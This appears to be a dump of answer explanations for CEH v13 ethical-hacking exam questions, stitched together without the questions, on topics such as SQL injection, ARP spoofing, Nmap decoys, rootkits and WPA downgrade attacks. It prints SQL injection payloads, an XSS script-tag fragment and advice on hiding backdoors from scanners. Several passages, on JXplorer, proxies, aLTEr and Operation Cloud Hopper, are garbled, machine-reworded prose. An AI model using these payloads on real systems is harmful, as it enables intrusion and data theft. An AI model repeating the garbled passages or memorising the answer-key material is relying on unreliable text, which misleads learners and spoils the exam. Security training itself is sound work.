This anomaly allows attackers to intercept traffic between victims and gateways. Increased traffic or DNS activity may occur but are not definitive indicators. Thus, IP-to-MAC inconsistencies are the most reliable confirmation of MitM activity.

Comprehensive and Detailed Explanation:

In TCP session hijacking or spoofing:

An attacker sends a spoofed packet with the ACK bit set and a guessed (or predicted) sequence number to fool the receiver into thinking it's a legitimate continuation of an existing session.

Fred is simulating this by sending a TCP packet with the ACK bit and using his own IP as the source, trying to trick the switch into believing it's part of an already established session.

From CEH v13 Courseware:

Module 11: Session Hijacking

This scenario describes Linear Cryptanalysis, a technique detailed in CEH v13 Cryptography. Linear cryptanalysis involves finding linear approximations that relate plaintext bits, ciphertext bits, and key bits using XOR operations. By analyzing a large number of known plaintext–ciphertext pairs, attackers can identify statistical biases that reveal information about the secret key.

CEH v13 explains that linear cryptanalysis differs from differential cryptanalysis in its approach. While differential cryptanalysis studies how differences in plaintext affect differences in ciphertext, linear cryptanalysis focuses on linear relationships and probability distributions.

The mention of XOR combinations and statistical analysis of plaintext–ciphertext pairs directly aligns with linear cryptanalysis. Brute-force attacks attempt all keys without analysis. Differential cryptanalysis focuses on input differences, not linear equations. Side-channel attacks exploit physical characteristics such as power consumption or timing.

Modern block ciphers like AES are designed to resist linear cryptanalysis by ensuring that linear approximations occur with probabilities close to random. CEH v13 highlights linear cryptanalysis as a foundational attack method used to evaluate cipher strength.

Therefore, Option C is correct.

This scenario clearly describes the need for Time-Based Blind SQL Injection, an advanced SQL injection technique covered in the CEH v13 Web Application Hacking module. Blind SQL injection is used when an application does not return database errors or visible output, making traditional techniques ineffective.

According to CEH v13, Time-Based Blind SQL Injection is particularly useful when:

The backend database type is unknown

Error messages are suppressed

UNION queries fail

No direct data is returned in responses

In this technique, attackers inject SQL statements that deliberately introduce time delays using database-specific functions such as SLEEP(), WAITFOR DELAY, or BENCHMARK(). The ethical hacker then observes the application’s response time to determine whether the injected condition is true or false.

For example:

' OR IF(1=1, SLEEP(5), 0) --

If the application response is delayed, it confirms that the injected SQL statement was executed successfully. CEH v13 categorizes this method as behavioral-based inference, where the attacker extracts information one bit at a time by analyzing timing differences.

Other options are incorrect because:

Content-Based Blind SQL Injection relies on visible differences in responses, which the question states are unavailable.

Union-Based SQL Injection requires knowing column count and data types.

Error-Based SQL Injection depends on database error messages being displayed.

CEH v13 emphasizes Time-Based Blind SQL Injection as a last-resort yet highly effective technique when dealing with hardened applications that suppress output, making it a frequent exam-tested concept.

In CEH v13 Module 01: Information Security Controls, the Remote Access Policy is defined as the guideline that governs:

Which remote access methods (VPNs, modems, RDP, etc.) are permitted.

Requirements for authentication and encryption.

Who is authorized to use them and under what conditions.

In This Case:

The use of a dial-out modem is considered a remote access method, especially if it bypasses the corporate firewall.

The analyst needs to check whether such remote access is permitted, and under what security controls.

Zone transfers (AXFR) are DNS operations used to replicate DNS data from a primary to a secondary server. If improperly configured, attackers can request these transfers and retrieve valuable DNS information, including hostnames and IPs.

Correct Statements:

A: Zone transfers are DNS protocol operations.

C: They transfer the entire DNS zone file (records for the domain).

E: Zone transfers use TCP port 53. Blocking it can prevent unauthorized transfers.

From CEH v13 Courseware:

Module 3: Scanning Networks

Topic: DNS Enumeration → Zone Transfers

CEH v13 Study Guide states:

“A zone transfer is a mechanism used by DNS servers to replicate databases. It can be used by attackers to retrieve detailed DNS information if not properly restricted. Zone transfers occur over TCP port 53.”

Incorrect Statements:

B/D: nslookup is a query tool; it doesn’t perform or manage zone transfers.

F: Zone transfers can happen on the internet if DNS servers are misconfigured.

The described attack is a Downgrade Security Attack. In this scenario:

The legitimate client and access point support both WPA2 and WPA3.

The attacker introduces a rogue AP that only supports WPA2.

The victim connects to this rogue AP using WPA2 (less secure) instead of WPA3.

Once downgraded, the attacker captures the handshake and attempts to crack the WPA2 encryption.

This is known as a “Downgrade Attack” or “Downgrade Negotiation Attack,” which exploits backward compatibility in security protocols.

Incorrect Options:

A. Timing-based attacks usually refer to side-channel analysis, not protocol downgrading.

B. Side-channel attacks extract info via timing, power usage, etc., not protocol negotiation.

D. Cache-based attacks exploit memory caching behavior.

Reference – CEH v13 Official Courseware:

Module 16: Hacking Wireless Networks

Section: “Wireless Encryption Attacks”

Subsection: “Downgrade Attacks (WPA3 to WPA2) and Rogue Access Points”

SYN/FIN scanning using IP fragments is a process of scanning that was developed to avoid false positives generated by other scans because of a packet filtering device on the target system. The TCP header splits into several packets to evade the packet filter. For any transmission, every TCP header must have the source and destination port for the initial packet (8-octet, 64-bit). The initialized flags in the next packet allow the remote host to reassemble the packets upon receipt via an Internet protocol module that detects the fragmented data packets using field-equivalent values of the source, destination, protocol, and identification.

The CEH Malware Threats module defines polymorphic malware as malicious code that mutates its appearance (code, encryption, packing) each time it propagates, making signature-based detection ineffective. Dormancy and trigger-based activation are also common characteristics.

CEH emphasizes that behavior-based detection, sandboxing, and heuristic analysis are the most effective countermeasures against polymorphic threats.

Option D is correct.

Options A, B, and C do not address polymorphic evasion techniques.

The main purpose of a rootkit is to hide malicious activity by modifying or replacing legitimate system binaries (e.g., ls, ps, netstat) so they no longer show the presence of malicious files, users, or processes. This enables attackers to maintain persistent and stealthy access.

From CEH v13 Official Courseware:

Module 6: Malware Threats → Rootkits

CEH v13 Study Guide states:

“Rootkits are stealthy programs designed to conceal the existence of other malicious processes or programs by replacing legitimate operating system utilities and binaries. This makes detection and removal extremely difficult.”

Incorrect Options:

A: This is a backdoor’s behavior.

B: A buffer overflow is a method of exploitation, not the rootkit’s purpose.

D: Refers to a backdoor or vulnerability, not a rootkit’s core function.

A vulnerability scan identifies known vulnerabilities by comparing system configurations and software versions against a database. It is mostly passive and does not confirm if vulnerabilities are exploitable.

Penetration testing, however, involves simulating real-world attacks. It attempts to actively exploit vulnerabilities, escalate privileges, and access sensitive data, offering a more realistic view of risk.

Reference – CEH v13 Official Study Guide:

Module 1: Introduction to Ethical Hacking

Quote:

“A penetration test goes beyond vulnerability identification by actively exploiting weaknesses to assess the actual risk and potential impact to the organization.”

Incorrect Options:

A. Scans do more than port scanning.

C. Penetration testing is often manual and detailed.

D. The difference is methodology, not just database size.

=

Web Server Attacks - DNS Server Hijacking Attacker compromises the DNS server and changes the DNS settings so that all the requests coming towards the target web server are redirected to his/her own malicious server. (P.1623/1607)

Before enforcing policies or issuing warnings, the most effective first step is to educate employees. Awareness training helps build a foundational understanding of risks and best practices, especially in low-security cultures.

━━━━━━━━━━━━━━━━━━━━━━

While perimeter defenses like firewalls and IPS provide a layer of protection, internal systems (such as network elements) must also be hardened. This includes:

Enforcing strong authentication

Applying regular patches and updates

Conducting vulnerability assessments and security audits

Security should be layered (defense in depth), and reliance on perimeter defense alone is insufficient.

Reference – CEH v13 Official Study Guide:

Module 3: Scanning Networks / Module 18: Incident Response

Quote:

“Internal systems must be hardened with secure configurations and tested regularly. A layered security approach is required even in protected environments.”

Incorrect Options:

B & C. Relying only on perimeter or physical security is not sufficient

D. While backup sites are part of DR, they don’t replace proactive protection

=

CEH documentation explains that WPA-TKIP was a transitional security protocol and does not use AES encryption, relying instead on RC4-based mechanisms.

The lack of AES-based encryption makes WPA-TKIP vulnerable to injection and replay attacks.

Option C is correct.

Options A applies to WEP.

Option B affects authentication, not TKIP weakness.

Option D is not the primary TKIP flaw.

CEH recommends WPA2/WPA3 with AES.

In CEH v13 Module 10: Injection Attacks, the SQL Injection technique is covered extensively. A common attack method is to manipulate the input fields so that the resulting SQL query becomes logically always true, effectively bypassing authentication.

Given the input:

Username: attack' or 1=1 --

Password: 123456

And assuming the original SQL query is:

SELECT * FROM Users WHERE UserName = '' AND UserPassword = '';

When inputs are substituted, the query becomes:

SELECT * FROM Users WHERE UserName = 'attack' or 1=1 --' AND UserPassword = '123456';

The -- sequence is used in SQL to indicate a comment. Everything after -- is ignored by the SQL engine. So the query essentially becomes:CopyEdit

SELECT * FROM Users WHERE UserName = 'attack' or 1=1;

This query is always true due to 1=1, and if the application is vulnerable, it grants access regardless of the password.

Option Analysis:

A. Incorrect – Contains '' (double quote) after attack, which would cause a syntax error due to extra quotation marks.

B. Correct – This is the accurate representation of what the SQL query would look like with a successful injection.

C. Incorrect – The input string is malformed, combining input into one literal string.

D. Incorrect – Misplacement of ' after the comment token -- invalidates the SQL syntax.

Reference from CEH v13 Study Materials:

Module 10 – Injection Attacks, Section: SQL Injection – Authentication Bypass

CEH v13 eCourseware Practical Lab: Exploiting SQL Injection Vulnerability in Login Forms

CEH Engage – Web Application Testing Phase: SQLi Exploitation in Login Panels

Dynamic ARP inspection (DAI) protects switching devices against Address Resolution Protocol (ARP) packet spoofing (also known as ARP poisoning or ARP cache poisoning).

DAI inspects ARPs on the LAN and uses the information in the DHCP snooping database on the switch to validate ARP packets and to protect against ARP spoofing. ARP requests and replies are compared against entries in the DHCP snooping database, and filtering decisions are made based on the results of those comparisons. When an attacker tries to use a forged ARP packet to spoof an address, the switch compares the address with entries in the database. If the media access control (MAC) address or IP address in the ARP packet does not match a valid entry in the DHCP snooping database, the packet is dropped.

aLTEr attacks are usually performed on LTE devices Attacker installs a virtual (fake) communication tower between two authentic endpoints intending to mislead the victim This virtual tower is used to interrupt the data transmission between the user and real tower attempting to hijack the active session.

The new aLTEr attack can be used against nearly all LTE connected endpoints by intercepting traffic and redirecting it to malicious websites together with a particular approach for Apple iOS devices.

This attack works by taking advantage of a style flaw among the LTE network — the information link layer (aka: layer-2) of the LTE network is encrypted with AES-CTR however it’s not integrity-protected, that is why an offender will modify the payload.

As a result, the offender is acting a classic man-in-the-middle wherever they’re movement as a cell tower to the victim.

This scenario represents a Tautology-Based SQL Injection, a fundamental SQL injection technique covered under the Web Application Hacking module in the CEH v13 curriculum. The defining characteristic of this attack is the injection of a condition that always evaluates to TRUE, thereby bypassing authentication or authorization controls.

In the given example, the injected input 1 OR 'T'='T'; -- manipulates the logical condition of the SQL query. A typical vulnerable login query may resemble:

SELECT * FROM users WHERE user_id = 1 AND password = 'input';

When the attacker submits the injected payload, the resulting SQL statement becomes:

SELECT * FROM users WHERE user_id = 1 OR 'T'='T'; --';

The expression 'T'='T' is a tautology, meaning it always evaluates to TRUE regardless of context. As a result, the database returns records without properly validating the user’s credentials, granting unauthorized access.

According to EC-Council CEH v13, tautology-based SQL injection is classified as a Boolean-based injection technique where attackers exploit improper input validation to alter the logical flow of SQL queries. This attack does not depend on database error messages (as in Error-Based SQL Injection), does not extract data using UNION statements (Union-Based SQL Injection), and does not rely on response delays (Time-Based Blind SQL Injection).

CEH v13 emphasizes that such attacks are especially effective against login forms and authentication mechanisms when developers fail to implement input sanitization, parameterized queries, or prepared statements. This attack is one of the most common and exam-tested SQL injection types because it clearly demonstrates how flawed logic can compromise application security without advanced techniques.

Understanding tautology-based SQL injection is critical for ethical hackers, as it forms the foundation for identifying and mitigating more complex SQL injection variants.

Local File Inclusion vulnerabilities arise when a web application incorporates user-supplied input into file-handling functions without proper sanitization. CEH courseware emphasizes that attackers can leverage directory traversal sequences (such as ../../) to escape the intended directory structure and access sensitive local files. An LFI payload commonly targets system files like /etc/passwd on Linux to extract user information or escalate the attack further.

When standard protections such as HTTPS, HTTP-only flags, and session regeneration are properly implemented, CEH teaches that predictable session identifiers become one of the few remaining avenues for session hijacking. Session token prediction involves analyzing entropy, randomness, or generation patterns within session IDs to mathematically infer future or valid tokens. If the application uses weak randomization algorithms, insufficient entropy sources, or predictable sequences, attackers may generate a valid session ID without direct interception. Techniques such as MitM interception or CSRF manipulation do not bypass strong transport-layer protections and cookie restrictions. Session fixation fails because the application regenerates the session ID upon login, invalidating pre-set identifiers. Therefore, the advanced and CEH-aligned method to hijack a protected session is predicting session IDs through side-channel or pattern analysis.

UDP scanning produces reliable "closed" results only when an ICMP Port Unreachable is returned. Silent responses indicate either open ports (no reply expected) or filtered ports (blocks dropping packets). CEH emphasizes that non-responses require retransmission or alternate verification techniques.

According to CEH v13 Security Operations and Incident Response, zero-day vulnerabilities pose one of the highest operational risks because exploits exist before official remediation is available. When active exploitation is observed and no vendor patch exists, immediate compensating controls must be deployed.

The first and most effective action is implementing virtual patching, typically through a Web Application Firewall (WAF) or Intrusion Prevention System (IPS). CEH v13 defines virtual patching as a security measure that blocks exploitation attempts at the network or application layer without modifying the vulnerable software. This approach allows organizations to maintain service availability while reducing exposure.

Shutting down the server (Option A) may prevent exploitation but introduces unacceptable business disruption and is not recommended as a first response. Backups and incident response planning (Option C) are critical but do not actively prevent exploitation. Passive monitoring (Option D) allows attackers to continue exploiting the vulnerability unchecked.

CEH v13 emphasizes that virtual patching is the preferred first response for zero-day threats, especially when systems are mission-critical. It provides immediate risk reduction while allowing time for vendor patch development and controlled deployment.

CEH covers advanced cryptanalytic attacks, including Meet-in-the-Middle (MITM) attacks, which are especially effective against multi-round symmetric encryption schemes. When an algorithm encrypts data twice using different keys, the naive brute-force method would require testing every possible combination of both keys—a time complexity of 2ⁿ × 2ⁿ. Meet-in-the-Middle dramatically reduces this complexity by splitting the problem in half. Attackers encrypt the plaintext using all potential values of the first key and store the results. They then decrypt the final ciphertext using all possible values of the second key. When an intermediate value matches one in storage, the corresponding key pair is identified. CEH highlights that this approach exploits the lack of key independence between two encryption layers, demonstrating how doubling encryption does not always double security. This attack is well-known for targeting 2DES, one of the historical examples covered in CEH. It is not related to side-channel attacks, brute-force flooding, or permutation reversal; it strictly relies on midpoint matching to reduce computational workload.

To prevent networks from sniffing attacks, organizations and individual users should keep away from applications using insecure protocols, like basic HTTP authentication, File Transfer Protocol (FTP), and Telnet. Instead, secure protocols such as HTTPS, Secure File Transfer Protocol (SFTP), and Secure Shell (SSH) should be preferred. In case there is a necessity for using any insecure protocol in any application, all the data transmission should be encrypted. If required, VPN (Virtual Private Networks) can be used to provide secure access to users.

NOTE: I want to note that the wording "best option" is valid only for the EC-Council's exam since the other options will not help against sniffing or will only help from some specific attack vectors.

The sniffing attack surface is huge. To protect against it, you will need to implement a complex of measures at all levels of abstraction and apply controls at the physical, administrative, and technical levels. However, encryption is indeed the best option of all, even if your data is intercepted - an attacker cannot understand it.

In CEH v13 Module 03: Scanning Networks, Nmap's evasion techniques are discussed for bypassing or confusing Intrusion Detection Systems (IDS) and firewalls.

The -D option in Nmap is used to enable decoy scanning. It inserts false IP addresses in the scan to obfuscate the true origin of the scan.

This technique helps in masking the attacker’s IP and can confuse IDS logs.

Option Clarification:

A. -n/-R: Disables DNS resolution (-n) or uses reverse DNS (-R), does not evade detection.

B. -0N/-0X/-0G: Output formats (normal, XML, grepable), not related to evasion.

C. -T: Controls timing (e.g., -T0 is stealthy, -T5 is aggressive), but not explicitly for IDS evasion.

D. -D: Correct. Used for IDS/firewall evasion by using decoy IPs.

In CEH v13 Module 05: System Hacking, once an attacker gains access to hashed passwords, cracking tools are employed to reverse or brute-force them.

Tool Breakdown:

John the Ripper: A powerful password cracking tool that supports many hash formats.

Hashcat: GPU-based, extremely fast password hash cracking tool.

THC-Hydra: Used for online attacks (e.g., SSH, FTP brute force).

Netcat: Not a password cracking tool — it’s a network utility used for:

Remote shell connections

Banner grabbing

File transfers

Port scanning

Therefore:

C. Netcat is the correct answer — it is not used for password cracking.

In CEH v13 Module 17: Mobile and IoT Security, Advanced SMS Phishing (also known as SMiShing) is described as a technique where attackers impersonate trusted entities via SMS to:

Trick users into entering authentication codes or PINs.

Deliver malicious payloads or alter device configurations.

Simulate OTA (Over-the-Air) provisioning messages.

In this case:

The attacker sends a fake OTA setup message asking for a PIN.

Once Ben enters the PIN, the device's configuration is hijacked.

Why Others Are Incorrect:

B. Bypass SSL pinning: Relates to mobile app reverse engineering and traffic interception.

C. Phishing: General term; SMS-specific variant is more accurate here.

D. Tap ‘n ghost: A touch screen manipulation attack, unrelated to messaging.

Correct answer is A. Advanced SMS phishing.

CEH explains that SQL injection testing should begin with controlled, intentional manipulation of SQL syntax to determine whether user input is improperly concatenated into backend queries. While destructive queries like DROP TABLE are not recommended in real-world ethical hacking engagements, CEH uses this example as a conceptual demonstration of how SQLi can influence database commands. In practice, a penetration tester would more safely use benign tautologies such as ' OR '1'='1 to test whether unauthorized data is returned. However, within CEH’s theoretical framing, injecting a clearly malicious SQL command demonstrates whether the input is executed at the database level. This validates improper sanitization, the use of dynamic SQL queries, and missing parameterized input handling. CEH stresses that SQLi is among the most critical vulnerabilities because it allows attackers to bypass authentication, exfiltrate data, or manipulate the database structure. XSS, brute-forcing, and directory traversal do not test SQL query manipulation and therefore do not confirm SQL injection.

The action that would best protect your web server from potential misconfiguration-based attacks is performing regular server configuration audits. A server configuration audit is a process of reviewing and verifying the security settings and parameters of the server, such as user accounts, permissions, services, ports, protocols, files, directories, logs, and patches. A server configuration audit can help you to identify and fix any security misconfigurations that may expose your server to attacks, such as using default credentials, enabling unnecessary services, leaving open ports, or missing security updates. A server configuration audit can also help you to comply with the security standards and best practices for your server, such as the CIS Benchmarks or the OWASP Secure Configuration Guide12.

The other options are not as effective as option A for the following reasons:

B. Enabling multi-factor authentication for users: This option is not relevant because it does not address the server misconfiguration issue, but the user authentication issue. Multi-factor authentication is a method of verifying the identity of the users by requiring them to provide two or more pieces of evidence, such as a password, a code, or a biometric factor. Multi-factor authentication can enhance the security of the user accounts and prevent unauthorized access, but it does not prevent the server from being attacked due to misconfigured settings or parameters3.

C. Implementing a firewall to filter traffic: This option is not sufficient because it does not prevent the server from being misconfigured, but only limits the exposure of the server to the network. A firewall is a device or software that monitors and controls the incoming and outgoing network traffic based on predefined rules. A firewall can protect the server from external attacks by blocking or allowing certain ports, protocols, or IP addresses. However, a firewall cannot protect the server from internal attacks or from attacks that exploit the allowed traffic. Moreover, a firewall itself can be misconfigured and cause security issues4.

D. Regularly backing up server data: This option is not preventive but reactive, as it does not protect the server from being attacked, but only helps to recover the data in case of an attack. Backing up server data is a process of creating and storing copies of the data on the server, such as files, databases, or configurations. Backing up server data can help you to restore the data in case of data loss, corruption, or deletion due to an attack. However, backing up server data does not prevent the server from being attacked in the first place, and it does not fix the security misconfigurations that may have caused the attack5.

In CEH v13 Maintaining Access, stealth and persistence are key goals after compromise. Placing a backdoor in a file type excluded from resource maps (such as image metadata, configuration files, or uncommon extensions) reduces the likelihood of discovery by automated scanners and integrity checks.

Option D is correct because many security tools focus on executable or commonly accessed web files. Files excluded from resource maps are less likely to be scanned or monitored.

Option A increases detection risk due to frequent changes. Option B increases signature visibility. Option C still exposes the file to access logs and monitoring.

CEH v13 highlights that attackers often hide backdoors in non-obvious locations to avoid detection. Therefore, Option D is correct.

The best measure to prevent similar attacks without overly restricting the use of personal devices is to conduct regular cybersecurity awareness training, focusing on phishing attacks. Cybersecurity awareness training is a process of educating and empowering employees on the best practices and behaviors to protect themselves and the organization from cyber threats, such as phishing, malware, ransomware, or data breaches. Cybersecurity awareness training can help the organization mitigate the risk of phishing incidents by providing the following benefits12:

It can increase the knowledge and skills of employees on how to identify and avoid phishing emails, messages, or links, such as by checking the sender, the subject, the content, the attachments, and the URL of the message, and by verifying the legitimacy and authenticity of the message before responding or clicking.

It can enhance the attitude and culture of employees on the importance and responsibility of cybersecurity, such as by encouraging them to report any suspicious or malicious activity, to follow the security policies and guidelines, and to seek help or guidance when in doubt or trouble.

It can reduce the human error and negligence that are often the main causes of phishing incidents, such as by reminding employees to update their devices and applications, to use strong and unique passwords, to enable multi-factor authentication, and to backup their data regularly.

The other options are not as optimal as option D for the following reasons:

A. Provide employees with corporate-owned devices for work-related tasks: This option is not feasible because it contradicts the BYOD policy, which allows employees to use their personal devices for work-related tasks. Providing employees with corporate-owned devices would require the organization to incur additional costs and resources, such as purchasing, maintaining, and securing the devices, as well as training and supporting the employees on how to use them. Moreover, providing employees with corporate-owned devices would not necessarily prevent phishing incidents, as the devices could still be compromised by phishing emails, messages, or links, unless the organization implements strict security controls and policies on the devices, which may limit the user autonomy and productivity3.

B. Implement a mobile device management solution that restricts the installation of non-approved applications: This option is not desirable because it violates the user autonomy and privacy under the BYOD policy, which allows employees to use their personal devices for both personal and professional purposes. Implementing a mobile device management solution that restricts the installation of non-approved applications would require the organization to monitor and control the devices of the employees, which may raise legal and ethical issues, such as data ownership, consent, and compliance. Furthermore, implementing a mobile device management solution that restricts the installation of non-approved applications would not completely prevent phishing incidents, as the employees could still receive phishing emails, messages, or links through the approved applications, unless the organization implements strict security controls and policies on the applications, which may affect the user experience and functionality4.

C. Require all employee devices to use a company-provided VPN for internet access: This option is not sufficient because it does not address the root cause of phishing incidents, which is the human factor. Requiring all employee devices to use a company-provided VPN for internet access would provide the organization with some benefits, such as encrypting the network traffic, hiding the IP address, and bypassing geo-restrictions. However, requiring all employee devices to use a company-provided VPN for internet access would not prevent phishing incidents, as the employees could still fall victim to phishing emails, messages, or links that lure them to malicious websites or applications, unless the organization implements strict security controls and policies on the VPN, which may affect the network performance and reliability.

Operation Cloud Hopper was an in depth attack and theft of data in 2017 directed at MSP within the uk (U.K.), us (U.S.), Japan, Canada, Brazil, France, Switzerland, Norway, Finland, Sweden, South Africa , India, Thailand, South Korea and Australia. The group used MSP as intermediaries to accumulate assets and trade secrets from MSP client engineering, MSP industrial manufacturing, retail, energy, pharmaceuticals, telecommunications, and government agencies.

Operation Cloud Hopper used over 70 variants of backdoors, malware and trojans. These were delivered through spear-phishing emails. The attacks scheduled tasks or leveraged services/utilities to continue Microsoft Windows systems albeit the pc system was rebooted. It installed malware and hacking tools to access systems and steal data.

A DNS zone file contains resource records (RRs) that define mappings and configurations for domains and subdomains. The standard records found in a zone file include:

SOA (Start of Authority): Indicates the beginning of the zone file.

NS (Name Server): Specifies the authoritative name servers.

A (Address): Maps hostnames to IPv4 addresses.

MX (Mail Exchange): Specifies mail servers.

These records are essential for the DNS resolution process and mail routing.

From CEH v13 Official Courseware:

Module 3: DNS Enumeration

Topic: DNS Record Types

CEH v13 Study Guide states:

“A zone file contains all the resource records including SOA, NS, A, and MX. These define name server authority, IP resolution, and mail server routing.”

Incorrect Options:

A: DNS is a protocol, not a resource record.

B: PTR is for reverse DNS, typically in a separate reverse zone file.

C: AXFR is a DNS transfer mechanism, not an RR in the zone file.

STP prevents bridging loops in a redundant switched network environment. By avoiding loops, you can ensure that broadcast traffic does not become a traffic storm.

STP is a hierarchical tree-like topology with a “root” switch at the top. A switch is elected as root based on the lowest configured priority of any switch (0 through 65,535). When a switch boots up, it begins a process of identifying other switches and determining the root bridge. After a root bridge is elected, the topology is established from its perspective of the connectivity. The switches determine the path to the root bridge, and all redundant paths are blocked. STP sends configuration and topology change notifications and acknowledgments (TCN/TCA) using bridge protocol data units (BPDU).

An STP attack involves an attacker spoofing the root bridge in the topology. The attacker broadcasts out an STP configuration/topology change BPDU in an attempt to force an STP recalculation. The BPDU sent out announces that the attacker’s system has a lower bridge priority. The attacker can then see a variety of frames forwarded from other switches to it. STP recalculation may also cause a denial-of-service (DoS) condition on the network by causing an interruption of 30 to 45 seconds each time the root bridge changes. An attacker using STP network topology changes to force its host to be elected as the root bridge.

Comprehensive and Detailed Explanation:

The code shown in the image is indicative of a Cross-Site Scripting (XSS) attack, where malicious JavaScript is injected into a web page via user input. In this case, the attacker includes:

%3Cscript%20src=...%3E — URL-encoded JavaScript tag to load a malicious script from an external source.

If the web application echoes this input back without sanitization, the script will execute in the context of the victim’s browser.

This allows the attacker to:

Steal cookies/session tokens

Perform actions on behalf of the victim

Redirect the victim to malicious websites

From CEH v13 Courseware:

Module 10: Web Application Hacking → Cross-Site Scripting (XSS)

Out-of-band SQL injection occurs when an attacker is unable to use an equivalent channel to launch the attack and gather results. … Out-of-band SQLi techniques would believe the database server’s ability to form DNS or HTTP requests to deliver data to an attacker. Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.

Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).

Out-of-band SQLi techniques would rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.

JXplorer could be a cross platform LDAP browser and editor. it’s a standards compliant general purpose LDAP client which will be used to search, scan and edit any commonplace LDAP directory, or any directory service with an LDAP or DSML interface.

It is extremely flexible and can be extended and custom in a very number of the way. JXplorer is written in java, and also the source code and source code build system ar obtainable via svn or as a packaged build for users who wish to experiment or any develop the program.

JX is is available in 2 versions; the free open source version under an OSI Apache two style licence, or within the JXWorkBench Enterprise bundle with inbuilt reporting, administrative and security tools.

JX has been through a number of different versions since its creation in 1999; the foremost recent stable release is version 3.3.1, the August 2013 release.

JXplorer could be a absolutely useful LDAP consumer with advanced security integration and support for the harder and obscure elements of the LDAP protocol. it’s been tested on Windows, Solaris, linux and OSX, packages are obtainable for HPUX, AIX, BSD and it should run on any java supporting OS.

A proxy server acts as a gateway between you and therefore the internet. It’s an intermediary server separating end users from the websites they browse. Proxy servers provide varying levels of functionality, security, and privacy counting on your use case, needs, or company policy.

If you’re employing a proxy server, internet traffic flows through the proxy server on its thanks to the address you requested. A proxy server is essentially a computer on the web with its own IP address that your computer knows. once you send an internet request, your request goes to the proxy server first. The proxy server then makes your web request on your behalf, collects the response from the online server, and forwards you the online page data so you’ll see the page in your browser.

TCP Maimon scan

This scan technique is very similar to NULL, FIN, and Xmas scan, but the probe used here is

FIN/ACK. In most cases, to determine if the port is open or closed, the RST packet should be generated as a response to a probe request. However, in many BSD systems, the port is open if the packet gets dropped in response to a probe.

How Nmap interprets responses to a Maimon scan probe

Probe Response Assigned State

No response received (even after retransmissions) open|filtered

TCP RST packet closed

ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) filtered

CEH v13 explains that when traditional enumeration techniques—such as SMB null sessions—are disabled, attackers often pivot to misconfigured LDAP services that still allow anonymous binding. LDAP anonymous bind, when not properly restricted, exposes directory information such as usernames, organizational units, group memberships, and other metadata. This aligns directly with the scenario, where the tester must avoid triggering alarms while still gathering internal data. LDAP queries generate minimal noise, often blending with normal authentication-related traffic, making them ideal for covert enumeration. Options A and C would require authentication or violate access restrictions, and DNS zone transfers (Option D) rarely succeed because modern DNS servers disable AXFR requests from unauthorized clients. CEH repeatedly stresses the importance of detecting and securing LDAP anonymous bind due to its potential for silent information leakage—making Option B the correct choice.

According to the Certified Ethical Hacker (CEH) IoT, OT, and SCADA Security module, side-channel attacks exploit indirect information leaks such as power consumption, electromagnetic emissions, timing variations, or thermal output rather than software vulnerabilities.

Option A is correct because monitoring hardware-level anomalies is the primary method for detecting side-channel exploitation. CEH materials emphasize that these attacks bypass traditional security controls.

Option B relates to cryptographic weaknesses, not side-channel analysis.

Option C addresses interface misuse, not covert data leakage.

CEH highlights that SCADA systems are especially vulnerable due to legacy hardware and limited monitoring capabilities.

The most effective long-term strategy to reduce the gap between black hats and white hats is through education. Training individuals in areas such as:

Risk analysis

Vulnerability identification

Defensive mechanisms and countermeasures

helps foster a deeper understanding of cybersecurity and ethical responsibilities.

From CEH v13 Official Guide:

Module 1: Introduction to Ethical Hacking

Section: Ethics and Legal Issues

Subsection: Bridging the Hacker Mindset

The guide states:

“Educating individuals on proper cybersecurity techniques and the consequences of malicious hacking is critical to transforming the skillset of potential black hats into productive white hat professionals. Providing structured knowledge through training, books, and ethical hacking certifications empowers aspiring hackers to use their skills positively.”

Incorrect Options:

B: Useful for operations, but doesn’t bridge a knowledge gap.

C: Lowering certification standards can reduce industry credibility.

D: Involves a specific audience and doesn't address the broader knowledge gap.

A brute-force attack is the most exhaustive password-cracking method. It tries every possible combination of characters (letters, numbers, and symbols) until the correct password is found.

From CEH v13 Courseware:

Module 6: Password Cracking Techniques

CEH v13 Study Guide states:

“Brute-force attacks try every possible combination until the correct password is discovered. It’s resource-intensive but guarantees success if enough time and processing power is available.”

Incorrect Options:

B: Refers to social engineering or coercion.

C: Describes a dictionary attack.

D: Refers to a rainbow table attack.

E: Not a cracking method.

Comprehensive and Detailed Explanation:

LDAP (Lightweight Directory Access Protocol) uses a hierarchical data structure similar to a directory tree. SQL databases use a relational structure with tables, rows, and columns.

Because of its hierarchical nature:

LDAP is excellent for parent-child relationships.

It struggles with representing many-to-many or many-to-one relationships efficiently.

From CEH v13 Courseware:

Module 4: Enumeration → LDAP Basics

Outdated server software often contains memory corruption flaws. CEH notes that buffer overflow exploits are a primary method for compromising vulnerable server binaries, allowing remote code execution. This approach targets the underlying service rather than application-layer input validation issues.

Comprehensive and Detailed Explanation:

Script Kiddies are individuals with minimal technical skills who use existing tools or scripts developed by others to perform attacks. They generally do not understand the underlying mechanisms and rely on publicly available hacking tools.

From CEH v13 Official Study Guide:

Module 1: Introduction to Ethical Hacking → Hacker Types

“Script kiddies are unskilled attackers who use tools created by others.”

ARP spoofing–based session hijacking is identified in CEH v13 Web Application and Network Attacks as one of the most stealthy and difficult-to-detect session compromise techniques, especially within internal or VPN-connected networks.

In ARP spoofing, attackers poison ARP caches to position themselves as a man-in-the-middle (MitM). Once in place, they can silently intercept, modify, or replay session data—even when encryption is used—by redirecting traffic transparently between endpoints.

Option A (sidejacking) is mitigated by HTTPS. Option C (session guessing) is noisy and detectable. Option D (cookie poisoning) relies on weak validation and is easier to detect via integrity checks.

CEH v13 highlights ARP spoofing as particularly dangerous because:

It exploits trusted local network behavior

It does not require breaking encryption directly

It is often invisible to users and applications

Therefore, Option B is the most challenging to detect and mitigate and is the correct answer.

In this attack KRACK is an acronym for Key Reinstallation Attack. KRACK may be a severe replay attack on Wi-Fi Protected Access protocol (WPA2), which secures your Wi-Fi connection. Hackers use KRACK to take advantage of a vulnerability in WPA2. When in close range of a possible victim, attackers can access and skim encrypted data using KRACK.

